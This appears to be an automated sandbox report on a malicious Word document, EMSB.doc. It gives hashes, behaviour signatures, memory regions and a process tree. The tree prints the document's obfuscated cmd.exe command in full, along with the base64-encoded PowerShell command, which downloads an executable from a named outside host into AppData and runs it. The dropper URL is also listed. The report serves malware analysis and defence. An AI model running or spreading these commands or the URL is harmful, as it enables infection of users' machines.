Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-05-2024 17:45

General

  • Target

    EMSB.doc

  • Size

    114KB

  • MD5

    754dc2d09d30c6e9d51a08feb7396dcc

  • SHA1

    f17f2e77515157a1f07338571ffc55db8a2d1573

  • SHA256

    1df932207319ad8505a88a915c3bbf5eb11fd12dba6d921cd107ef497da25692

  • SHA512

    a69edd08a95888287841461ee19508b5e03063052240911f1ebd4cb74f23bb3e40b6f980edce5e1d476498c4cfcc61b091f6173b20785aec916b54e59c6ec8fd

  • SSDEEP

    1536:/9F+u6qHEmcutqTRE23B9bEfAl/eDW3+jYrqCEtvaaeeAbgy1oZUeB6:/+u6Ict73PbE4xrLKngUUeU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kotobelamx.com/DAB/nerimf.php?l=willow2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\EMSB.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^r^A^G^8^A^d^A^B^v^A^G^I^A^Z^Q^B^s^A^G^E^A^b^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^E^A^E^E^A^Q^g^A^v^A^G^4^A^Z^Q^B^y^A^G^k^A^b^Q^B^m^A^C^4^A^c^A^B^o^A^H^A^A^P^w^B^s^A^D^0^A^d^w^B^p^A^G^w^A^b^A^B^v^A^H^c^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^I^A^M^Q^A^0^A^D^M^A^M^Q^A^z^A^D^Q^A^M^w^A^2^A^D^I^A^M^A^A^3^A^D^Q^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^M^g^A^x^A^D^Q^A^M^w^A^x^A^D^M^A^N^A^A^z^A^D^Y^A^M^g^A^w^A^D^c^A^N^A^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^D^s^A
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOweRsHeLL.exe -EC KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBrAG8AdABvAGIAZQBsAGEAbQB4AC4AYwBvAG0ALwBEAEEAQgAvAG4AZQByAGkAbQBmAC4AcABoAHAAPwBsAD0AdwBpAGwAbABvAHcAMgAuAHAAYQBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAxADIAMQA0ADMAMQAzADQAMwA2ADIAMAA3ADQAMQAuAGUAeABlAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADEAMgAxADQAMwAxADMANAAzADYAMgAwADcANAAxAC4AZQB4AGUALgBlAHgAZQAnADsAIABFAHgAaQB0ADsA
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4468

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD8BB5.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gbjui03h.4yq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2060-10-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-5-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-9-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-1-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-6-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-7-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-8-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-11-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-16-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-17-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-15-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-14-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-13-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-12-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-566-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-2-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-18-0x00007FFB1F000000-0x00007FFB1F010000-memory.dmp

    Filesize

    64KB

  • memory/2060-19-0x00007FFB1F000000-0x00007FFB1F010000-memory.dmp

    Filesize

    64KB

  • memory/2060-4-0x00007FFB6186D000-0x00007FFB6186E000-memory.dmp

    Filesize

    4KB

  • memory/2060-513-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-529-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-534-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-533-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-3-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-0-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-563-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-564-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-565-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-562-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/4468-545-0x0000025AEE510000-0x0000025AEE532000-memory.dmp

    Filesize

    136KB